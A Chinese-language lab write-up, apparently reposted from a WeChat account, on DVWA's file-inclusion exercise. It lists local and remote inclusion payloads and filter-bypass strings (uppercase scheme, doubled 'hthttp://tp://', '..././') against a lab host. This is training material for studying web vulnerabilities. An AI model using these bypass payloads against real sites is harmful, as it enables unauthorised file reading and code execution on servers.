phpinfo()
../../hackable/uploads/phpinfo.php
../../hackable/uploads/phpinfo.png
同时也可以修改参数为本地路径和远程路径进行文件包含,即本地文件包含和远程文件包含。
本地文件包含:
file://D:PhpStudyWWWdvwahackableuploadsphpinfo.php
file://D:PhpStudyWWWdvwahackableuploadsphpinfo.png
http://192.168.100.148/dvwa/hackable/uploads/phpinfo.php
http://192.168.100.148/dvwa/hackable/uploads/phpinfo.png
查看代码,服务器将参数中的http:// 、https:// 、../、 ..都替换为空,如图:
解决办法:
1.使用本地文件包含
file://D:PhpStudyWWWdvwahackableuploadsphpinfo.php
2.通过双写或者大小写进行绕过。
大小写绕过:
HTTP://192.168.100.148/dvwa/hackable/uploads/phpinfo.php
双写绕过:
hthttp://tp://192.168.100.148/dvwa/hackable/uploads/phpinfo.php
..././..././hackable/uploads/phpinfo.php
按照如上的步骤进行测试后发现只有本地包含可以成功,其他两种都不能打开,查看代码:
原文始发于微信公众号(仙友道):DVWA | 文件包含
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论